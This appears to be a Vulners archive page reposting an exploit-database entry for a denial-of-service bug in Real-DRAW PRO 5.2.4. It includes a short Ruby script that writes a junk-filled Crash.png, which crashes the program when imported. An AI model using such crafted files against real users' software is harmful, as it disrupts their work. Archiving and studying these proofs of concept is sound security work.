Vulners
Lucene search
Real-DRAW PRO 5.2.4 Import File Crash
Real-DRAW PRO 5.2.4 Import File Crash
===================================================================================
# Exploit Title:Real-DRAW PRO 5.2.4 Malicious PNG File Denial of service
# Vendor : http://www.mediachance.com/
# Author: Ahmed Elhady Mohamed
# Email : [email protected]
# Website: www.infosec4all.tk
# version: 5.2.4
# Category: DOS
# Tested on: windows XP SP3
===================================================================================
########################################DESC#############################################
#Real-Draw seamlessly combines vector tools with the rich look of pixel based images and#
#innovative natural paint techniques into a single graphics editor. #
#########################################################################################
########################################################################################
#Real-DRAW PRO 5.2.4 crashes while importing a crafted PNG, WMF, PSD, TGA, TTF, BMP, #
#TIFF and PCX file #
#To trigger the exploit , go to file->Import #
########################################################################################
#!/usr/bin/ruby
File.open "Crash.png" , "w" do |file|
junk = "A" *1000
file.write junk
end
# 0day.today [2018-01-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 May 2012 00:00Current
7High risk
Vulners AI Score7